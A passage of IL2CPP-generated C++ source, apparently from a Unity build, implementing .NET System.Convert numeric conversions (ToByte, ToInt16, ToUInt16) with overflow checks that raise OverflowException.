Convert_ToByte_m645FE381788C101B2BE504F57811E655AD432935 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m645FE381788C101B2BE504F57811E655AD432935_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_000e; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)255))))))) { goto IL_001e; } } IL_000e: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToByte_m645FE381788C101B2BE504F57811E655AD432935_RuntimeMethod_var); } IL_001e: { int64_t L_4 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_4))); } } // System.Byte System.Convert::ToByte(System.UInt64) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mBA74300A0EBF60E75A3ABED4AA4AAB62DF40014A (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mBA74300A0EBF60E75A3ABED4AA4AAB62DF40014A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)255)))))))) { goto IL_0019; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral66A2CA93B4D74A9945AF3335F6FDED9B5261D3B4, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToByte_mBA74300A0EBF60E75A3ABED4AA4AAB62DF40014A_RuntimeMethod_var); } IL_0019: { uint64_t L_3 = ___value0; return (uint8_t)(((int32_t)((uint8_t)L_3))); } } // System.Byte System.Convert::ToByte(System.Single) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mBF7D0A7CFDAB28F8B3D979168CFE7A6404A2A606 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mBF7D0A7CFDAB28F8B3D979168CFE7A6404A2A606_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); uint8_t L_1 = Convert_ToByte_m91AFBFC15EA62AF9EA9826E3F777635C1E18F32C((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.Byte System.Convert::ToByte(System.Double) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m91AFBFC15EA62AF9EA9826E3F777635C1E18F32C (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_m91AFBFC15EA62AF9EA9826E3F777635C1E18F32C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_1 = Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C(L_0, /*hidden argument*/NULL); uint8_t L_2 = Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64(L_1, /*hidden argument*/NULL); return L_2; } } // System.Byte System.Convert::ToByte(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mA8B21973561985CBAAAE340648DFCBE6B1A04771 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mA8B21973561985CBAAAE340648DFCBE6B1A04771_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); uint8_t L_2 = Decimal_ToByte_mE1A4E4DBE29BA89E812BA28BC7B637B849DC2526(L_1, /*hidden argument*/NULL); return L_2; } } // System.Byte System.Convert::ToByte(System.String) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mF5A487816056F3D1509511E3CD8FA1DF3D91F581 (String_t* ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToByte_mF5A487816056F3D1509511E3CD8FA1DF3D91F581_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (uint8_t)0; } IL_0005: { String_t* L_1 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_2 = CultureInfo_get_CurrentCulture_mD86F3D8E5D332FB304F80D9B9CA4DE849C2A6831(/*hidden argument*/NULL); uint8_t L_3 = Byte_Parse_mEFBC459D6ADA0FED490539CD8731E45AE2D2587C(L_1, L_2, /*hidden argument*/NULL); return L_3; } } // System.Byte System.Convert::ToByte(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mD97407CDB2EE7955D3079D19DA2BD731F83920B7 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (uint8_t)0; } IL_0005: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint8_t L_3 = Byte_Parse_mF53D7EFF3FC8B040EE675E62145287C7F728F772(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.Int16 System.Convert::ToInt16(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m9E4E48A97E050355468F58D2EAEB3AB3C811CE8B (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m9E4E48A97E050355468F58D2EAEB3AB3C811CE8B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int16_t L_3 = InterfaceFuncInvoker1< int16_t, RuntimeObject* >::Invoke(5 /* System.Int16 System.IConvertible::ToInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (int16_t)0; } } // System.Int16 System.Convert::ToInt16(System.Boolean) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mE5AC67CF54A1DC058F4FF94444E2BED13D4E41A1 (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (int16_t)0; } IL_0005: { return (int16_t)1; } } // System.Int16 System.Convert::ToInt16(System.Char) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mBAB0E578750A2DE0990F9B301C7CBE2397A61A35 (Il2CppChar ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_mBAB0E578750A2DE0990F9B301C7CBE2397A61A35_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Il2CppChar L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)32767)))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt16_mBAB0E578750A2DE0990F9B301C7CBE2397A61A35_RuntimeMethod_var); } IL_0018: { Il2CppChar L_3 = ___value0; return (((int16_t)((int16_t)L_3))); } } // System.Int16 System.Convert::ToInt16(System.SByte) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m53B289D51E0000689AD2D0D8B64C9FC52E25382D (int8_t ___value0, const RuntimeMethod* method) { { int8_t L_0 = ___value0; return L_0; } } // System.Int16 System.Convert::ToInt16(System.Byte) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mEC55F68B89662CDBC0E1D7D596EC04153B377E60 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return L_0; } } // System.Int16 System.Convert::ToInt16(System.UInt16) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m57BC4B92DCAEAA22820CD1915778B407AC23D9C5 (uint16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m57BC4B92DCAEAA22820CD1915778B407AC23D9C5_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint16_t L_0 = ___value0; if ((((int32_t)L_0) <= ((int32_t)((int32_t)32767)))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt16_m57BC4B92DCAEAA22820CD1915778B407AC23D9C5_RuntimeMethod_var); } IL_0018: { uint16_t L_3 = ___value0; return (((int16_t)((int16_t)L_3))); } } // System.Int16 System.Convert::ToInt16(System.Int32) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)((int32_t)-32768)))) { goto IL_0010; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)32767)))) { goto IL_0020; } } IL_0010: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3_RuntimeMethod_var); } IL_0020: { int32_t L_4 = ___value0; return (((int16_t)((int16_t)L_4))); } } // System.Int16 System.Convert::ToInt16(System.UInt32) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mE8E094D5AD321E5E6756E332116FAF1C084A1CD2 (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_mE8E094D5AD321E5E6756E332116FAF1C084A1CD2_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((((int64_t)(((int64_t)((uint64_t)L_0)))) <= ((int64_t)(((int64_t)((int64_t)((int32_t)32767))))))) { goto IL_001a; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt16_mE8E094D5AD321E5E6756E332116FAF1C084A1CD2_RuntimeMethod_var); } IL_001a: { uint32_t L_3 = ___value0; return (((int16_t)((int16_t)L_3))); } } // System.Int16 System.Convert::ToInt16(System.Int64) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m452BBDF72FBBBF90915F464E0558DA82CE1F7DBF (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m452BBDF72FBBBF90915F464E0558DA82CE1F7DBF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)((int32_t)-32768))))))) { goto IL_0012; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)32767))))))) { goto IL_0022; } } IL_0012: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToInt16_m452BBDF72FBBBF90915F464E0558DA82CE1F7DBF_RuntimeMethod_var); } IL_0022: { int64_t L_4 = ___value0; return (((int16_t)((int16_t)L_4))); } } // System.Int16 System.Convert::ToInt16(System.UInt64) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mC121EAEA7C8458D987480F1669C6A40082AA93C1 (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_mC121EAEA7C8458D987480F1669C6A40082AA93C1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)32767)))))))) { goto IL_0019; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB2DFA6C94FCB93E0645DBB6C79D5282340489A50, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt16_mC121EAEA7C8458D987480F1669C6A40082AA93C1_RuntimeMethod_var); } IL_0019: { uint64_t L_3 = ___value0; return (((int16_t)((int16_t)L_3))); } } // System.Int16 System.Convert::ToInt16(System.Single) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m7F87DC717F07D47C104372D55D3E72FBE26CF2CC (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m7F87DC717F07D47C104372D55D3E72FBE26CF2CC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int16_t L_1 = Convert_ToInt16_m1F982FED72A4829E1DE1A64F162F13555FC1F7EC((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.Int16 System.Convert::ToInt16(System.Double) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m1F982FED72A4829E1DE1A64F162F13555FC1F7EC (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_m1F982FED72A4829E1DE1A64F162F13555FC1F7EC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_1 = Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C(L_0, /*hidden argument*/NULL); int16_t L_2 = Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3(L_1, /*hidden argument*/NULL); return L_2; } } // System.Int16 System.Convert::ToInt16(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_mBB1C4102314D1306F894C0E3CC7FC72900EE4E13 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt16_mBB1C4102314D1306F894C0E3CC7FC72900EE4E13_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); int16_t L_2 = Decimal_ToInt16_mA2BB2FEA8CBAF4AB1AE4F3AD1F877B5A5DBA165C(L_1, /*hidden argument*/NULL); return L_2; } } // System.Int16 System.Convert::ToInt16(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m4EE0839C08F0FDFBB7719B316D962B043F55589B (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (int16_t)0; } IL_0005: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int16_t L_3 = Int16_Parse_m8974BEBECCE6184E1A2CA312D637E40B731F49B2(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.UInt16 System.Convert::ToUInt16(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mB7311DB5960043FD81C1305B69C5328126F43C89 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_mB7311DB5960043FD81C1305B69C5328126F43C89_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint16_t L_3 = InterfaceFuncInvoker1< uint16_t, RuntimeObject* >::Invoke(6 /* System.UInt16 System.IConvertible::ToUInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (uint16_t)0; } } // System.UInt16 System.Convert::ToUInt16(System.Boolean) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mE5DBE88FC67DB81359A27BEC9BC61EE1C4816F7E (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (uint16_t)0; } IL_0005: { return (uint16_t)1; } } // System.UInt16 System.Convert::ToUInt16(System.Char) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m2F8D708D059B3A7FC317AD8A56D492253E359E24 (Il2CppChar ___value0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___value0; return L_0; } } // System.UInt16 System.Convert::ToUInt16(System.SByte) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m3A0BC273AC75E936BBAA48B0D451DB161CEC11CE (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m3A0BC273AC75E936BBAA48B0D451DB161CEC11CE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt16_m3A0BC273AC75E936BBAA48B0D451DB161CEC11CE_RuntimeMethod_var); } IL_0014: { int8_t L_3 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_3))); } } // System.UInt16 System.Convert::ToUInt16(System.Byte) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m7251119DC9E451E9DB0AB5742769643B7F414876 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return L_0; } } // System.UInt16 System.Convert::ToUInt16(System.Int16) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m3BC2069048E0E6C17C6B4C18BFB8FC949739BFFF (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m3BC2069048E0E6C17C6B4C18BFB8FC949739BFFF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt16_m3BC2069048E0E6C17C6B4C18BFB8FC949739BFFF_RuntimeMethod_var); } IL_0014: { int16_t L_3 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_3))); } } // System.UInt16 System.Convert::ToUInt16(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000c; } } { int32_t L_1 = ___value0; if ((((int32_t)L_1) <= ((int32_t)((int32_t)65535)))) { goto IL_001c; } } IL_000c: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7_RuntimeMethod_var); } IL_001c: { int32_t L_4 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_4))); } } // System.UInt16 System.Convert::ToUInt16(System.UInt32) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m19D8F9B74EB5F96C835FA5045E925F000750A8B3 (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m19D8F9B74EB5F96C835FA5045E925F000750A8B3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((!(((uint32_t)L_0) > ((uint32_t)((int32_t)65535))))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, 